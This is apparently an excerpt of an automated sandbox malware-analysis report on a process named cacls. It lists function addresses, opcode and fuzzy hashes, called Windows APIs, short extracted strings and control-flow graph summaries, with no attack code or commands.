                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 21ac9ac038b89c09f7da6c3a753d8b0986f25bb7b6d10430147603c28d9d78f5
                                                                                                              • Instruction ID: 198e09e57e6d1e57a9a0fd70a7fcbdd1e3f08348580e3c61af616c3c88b9b55f
                                                                                                              • Opcode Fuzzy Hash: 21ac9ac038b89c09f7da6c3a753d8b0986f25bb7b6d10430147603c28d9d78f5
                                                                                                              • Instruction Fuzzy Hash: 7C90026134140842E500B1585414B060045D7E2311F59C016E5068555D8719CD52612A
                                                                                                              Function 03582FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bbc1519fd8832bfce5d93e1d9e51ed9c0e3d680fee0e9674914e74a6882f059e
                                                                                                              • Instruction ID: f7fd9c1cac873184fb0ab1796788a4f0f381094b8123c8cc70d989edcdaecea9
                                                                                                              • Opcode Fuzzy Hash: bbc1519fd8832bfce5d93e1d9e51ed9c0e3d680fee0e9674914e74a6882f059e
                                                                                                              • Instruction Fuzzy Hash: A3900221311C0442E600B5685C14B07004597D1313F59C116A4158555CCA1589615525
                                                                                                              Function 03582FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 176d127ff0c5e70eb8edc40499ab661d3f20580c9f2b2dd3c7396e608045c301
                                                                                                              • Instruction ID: 8af7c35b02d827cbe0fd0efdaa0f0c07e5f792644086c3a22b2c3d3841c05402
                                                                                                              • Opcode Fuzzy Hash: 176d127ff0c5e70eb8edc40499ab661d3f20580c9f2b2dd3c7396e608045c301
                                                                                                              • Instruction Fuzzy Hash: 26900221701404425540B16898449064045BBE2221759C122A499C551D865989655669
                                                                                                              Function 03582EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: de78d3ac4756b4b5dc1291049b63480b726155d0bc2eb54d71e445313c52e79c
                                                                                                              • Instruction ID: 020eae49e45df835fd234ce5cf3f75403ac9f9f598e6afe35aba6c2fa3a434c2
                                                                                                              • Opcode Fuzzy Hash: de78d3ac4756b4b5dc1291049b63480b726155d0bc2eb54d71e445313c52e79c
                                                                                                              • Instruction Fuzzy Hash: C190026130180803E540B5585804607004597D1312F59C012A6068556E8B298D516139
                                                                                                              Function 03582E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 64a35f96e719a528b7ae5e023ddaa6ac550aed469a149d13dabc7066d68c8ddb
                                                                                                              • Instruction ID: 6d1abb37773ecf5aef3aff1cbd31f05ff9cb827def57e4718085cb3b1273118c
                                                                                                              • Opcode Fuzzy Hash: 64a35f96e719a528b7ae5e023ddaa6ac550aed469a149d13dabc7066d68c8ddb
                                                                                                              • Instruction Fuzzy Hash: 4290022170140902E501B1585404616004A97D1251F99C023A5028556ECB258A92A135
                                                                                                              Function 03582D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c821ea4965a86076d2b78462427a17268bc57142f18562e54a4c58922db451d9
                                                                                                              • Instruction ID: 3c4a5fe1634fd3c679f07d856a135afc68a39554c18473778d0725b2ed99aa80
                                                                                                              • Opcode Fuzzy Hash: c821ea4965a86076d2b78462427a17268bc57142f18562e54a4c58922db451d9
                                                                                                              • Instruction Fuzzy Hash: 8A90022931340402E580B158640860A004597D2212F99D416A4019559CCA1589695325
                                                                                                              Function 03582D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c7a79f58c747e3907afeada980166b3b00dd1e59e6a345bf5b238fb647a4a3fa
                                                                                                              • Instruction ID: 365bf99a8f9944444b99020f155846b42101fc260fb8b4dc34739e593391ba34
                                                                                                              • Opcode Fuzzy Hash: c7a79f58c747e3907afeada980166b3b00dd1e59e6a345bf5b238fb647a4a3fa
                                                                                                              • Instruction Fuzzy Hash: 3C90022130140403E540B15864186064045E7E2311F59D012E4418555CDA1589565226
                                                                                                              Function 03582DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 53117ebb2ea12785da06137d18e875c25c93ddc6e63efd6333301d817d95cf7c
                                                                                                              • Instruction ID: 13433c1e4ab8758c3fd5820c7625ba4d3353a0056a7bec32260150877cefd314
                                                                                                              • Opcode Fuzzy Hash: 53117ebb2ea12785da06137d18e875c25c93ddc6e63efd6333301d817d95cf7c
                                                                                                              • Instruction Fuzzy Hash: B7900221342445526945F15854045074046A7E1251799C013A5418951C86269956D625
                                                                                                              Function 03582DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0623da781ef3ff4f3ee7ab6cba67bc43efbae4aaf2c47d077982e6c10f2b8a2c
                                                                                                              • Instruction ID: ac11304e70fce4957323aa541e0bce488e25a1156db689c1a495b896a6f51f79
                                                                                                              • Opcode Fuzzy Hash: 0623da781ef3ff4f3ee7ab6cba67bc43efbae4aaf2c47d077982e6c10f2b8a2c
                                                                                                              • Instruction Fuzzy Hash: B090023130140813E511B1585504707004997D1251F99C413A4428559D97568A52A125
                                                                                                              Function 03582C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7fcbaf8a77a21f6fdc97aea79591eafdfe4fb7bf8521d022260ccdcdfed0a816
                                                                                                              • Instruction ID: 921427d1af0afa6d8a380e85acfaedb60a42ce6584042cdbd206b5bd8c1bdf17
                                                                                                              • Opcode Fuzzy Hash: 7fcbaf8a77a21f6fdc97aea79591eafdfe4fb7bf8521d022260ccdcdfed0a816
                                                                                                              • Instruction Fuzzy Hash: AC90023130148C02E510B158940474A004597D1311F5DC412A8428659D879589917125
                                                                                                              Function 03582C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 9a9e342d57791bddc3cb4b7ab60848e18e634dbb1869d06f68600bd3f7dffa4c
                                                                                                              • Instruction ID: e0a29aec563d8968e35dc388047ed737a1ea91100d78daa4b7b5117a27e3c85e
                                                                                                              • Opcode Fuzzy Hash: 9a9e342d57791bddc3cb4b7ab60848e18e634dbb1869d06f68600bd3f7dffa4c
                                                                                                              • Instruction Fuzzy Hash: 9090023130140C42E500B1585404B46004597E1311F59C017A4128655D8715C9517525
                                                                                                              Function 03582CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8a0a98a571bb03826d45979ee0a74c81a7310edabfb8f64b760fab1ce685a9d3
                                                                                                              • Instruction ID: 224cfc038e008366708b845210f68251e4ea1a3c7593fd426d0b7e38e6062354
                                                                                                              • Opcode Fuzzy Hash: 8a0a98a571bb03826d45979ee0a74c81a7310edabfb8f64b760fab1ce685a9d3
                                                                                                              • Instruction Fuzzy Hash: 8090023130140802E500B5986408646004597E1311F59D012A9028556EC76589916135
                                                                                                              Function 035835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 31b7b1ae5b684b7601a4854b30842a6ae90146d831de7c76a10e8017b611603b
                                                                                                              • Instruction ID: 7a83d21c606dc25ee14e03ecdcf82fb61fd56cc866af48a8ddff5b4336ebff5d
                                                                                                              • Opcode Fuzzy Hash: 31b7b1ae5b684b7601a4854b30842a6ae90146d831de7c76a10e8017b611603b
                                                                                                              • Instruction Fuzzy Hash: 0890023170550802E500B1585514706104597D1211F69C412A4428569D87958A5165A6
                                                                                                              Function 035839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 15b62f3ed2ca84565c0dfa14c7e2382c11bb2ea1af842fd979c6f0cd0b6f159a
                                                                                                              • Instruction ID: 2376930868cb3a5a940e31046e34729bb93def567cc581e103b8a9240d8ce066
                                                                                                              • Opcode Fuzzy Hash: 15b62f3ed2ca84565c0dfa14c7e2382c11bb2ea1af842fd979c6f0cd0b6f159a
                                                                                                              • Instruction Fuzzy Hash: 9C90022134545502E550B15C54046164045B7E1211F59C022A4818595D865589556225
                                                                                                              Function 02CF3E10 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108sleepCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 434 2cf3e10-2cf3e58 call 2cfb8d0 437 2cf3e5e-2cf3ed8 call 2cfb9b0 call 2ce4890 call 2cd13e0 call 2cf1fe0 434->437 438 2cf3f64-2cf3f6a 434->438 447 2cf3ee0-2cf3ef4 Sleep 437->447 448 2cf3ef6-2cf3f08 447->448 449 2cf3f55-2cf3f5c 447->449 450 2cf3f2a-2cf3f43 call 2cf6370 448->450 451 2cf3f0a-2cf3f28 call 2cf62d0 448->451 449->447 452 2cf3f5e 449->452 456 2cf3f48-2cf3f4b 450->456 451->456 452->438 456->449
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02CF3EEB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: i:4$net.dll$wininet.dll
                                                                                                              • API String ID: 3472027048-2634764057
                                                                                                              • Opcode ID: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                                                                              • Instruction ID: feb5aa7631d880cadf8595685af2c370737d8282235238ffcb931b28a8e0c899
                                                                                                              • Opcode Fuzzy Hash: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                                                                              • Instruction Fuzzy Hash: 7A317EB1A00745BBC754DFA4C880FEAB7B9EB88704F00415CEA5D6B240D3B1AB40CFA0
                                                                                                              Function 02CE0FFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 457 2ce0ffc-2ce1016 458 2ce1019-2ce1054 457->458 459 2ce1056 458->459 460 2ce10b4-2ce110a call 2ce4890 call 2cd13e0 call 2cf1fe0 458->460 462 2ce1057-2ce1058 459->462 477 2ce110c-2ce111b PostThreadMessageW 460->477 478 2ce112a-2ce1130 460->478 464 2ce105a-2ce106c 462->464 465 2ce1084 462->465 464->458 473 2ce106e-2ce1075 464->473 465->462 466 2ce1085-2ce1087 465->466 468 2ce1089-2ce1090 466->468 469 2ce1091 466->469 468->469 475 2ce1077-2ce1080 473->475 476 2ce1082-2ce1083 473->476 475->476 476->465 477->478 479 2ce111d-2ce1127 477->479 479->478
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 02CE1117
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881
                                                                                                              • Opcode ID: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                                                                              • Instruction ID: c436444c10a53f21e7721f974c83f292e6cc7bcd18a9164c752c937e7d750a81
                                                                                                              • Opcode Fuzzy Hash: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                                                                              • Instruction Fuzzy Hash: 3D31BF72A052C47B8B01DB759C41DE9BBA8EE923A471841A9EE499B101D6768E038BD1
                                                                                                              Function 02CE1097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 480 2ce1097-2ce10d2 call 2cfba00 call 2cfc410 485 2ce10d8-2ce110a call 2cd13e0 call 2cf1fe0 480->485 486 2ce10d3 call 2ce4890 480->486 491 2ce110c-2ce111b PostThreadMessageW 485->491 492 2ce112a-2ce1130 485->492 486->485 491->492 493 2ce111d-2ce1127 491->493 493->492
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 02CE1117
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881
                                                                                                              • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                                              • Instruction ID: 61b4ec0cb422f4745bf990464cd9de97d4ef0faa8349861ab758aa38be6e4b24
                                                                                                              • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                                              • Instruction Fuzzy Hash: A91102B2D4025C7EDF219AE48C81DEFBB7CEF412A4F058168FA58A7140E2744E069BA1
                                                                                                              Function 02CE10A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 494 2ce10a0-2ce10b2 495 2ce10ba-2ce10d2 call 2cfc410 494->495 496 2ce10b5 call 2cfba00 494->496 499 2ce10d8-2ce110a call 2cd13e0 call 2cf1fe0 495->499 500 2ce10d3 call 2ce4890 495->500 496->495 505 2ce110c-2ce111b PostThreadMessageW 499->505 506 2ce112a-2ce1130 499->506 500->499 505->506 507 2ce111d-2ce1127 505->507 507->506
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 02CE1117
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881
                                                                                                              • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                                              • Instruction ID: 447c35570e78fcf92a80aca0dfe554d9d3fe13ea722d8ecfdc334bd6f5e7751f
                                                                                                              • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                                              • Instruction Fuzzy Hash: 8801C0B2D0024C7AEF11AAE48C81DEFBB7CEF416D4F058064FA18A7100E6785E069BB1
                                                                                                              Function 02CEF869 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              • Opcode ID: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
                                                                                                              • Instruction ID: acc5464c0937941b742f83de7c67150766dae3ec5979af420a21f3950596b17c
                                                                                                              • Opcode Fuzzy Hash: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
                                                                                                              • Instruction Fuzzy Hash: A2314376A0020AAFDF10DFD8C8809EEB7B9BF88304B108559E555EB214D771EE45CBA0
                                                                                                              Function 02CEF870 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              • Opcode ID: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                                                                              • Instruction ID: 68d9f3462d2fc6dab380c11d7a32cfe2665068b449d86b7a73fa6921f69e205f
                                                                                                              • Opcode Fuzzy Hash: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                                                                              • Instruction Fuzzy Hash: 82314176A0020AAFDB00DFD8C8809EEB3B9BF88304B108559E556AB214D771EE45CBA0
                                                                                                              Function 02CE84EA Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02CE2040,02CF834F,02CF5A0E,02CE2006), ref: 02CE84E3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
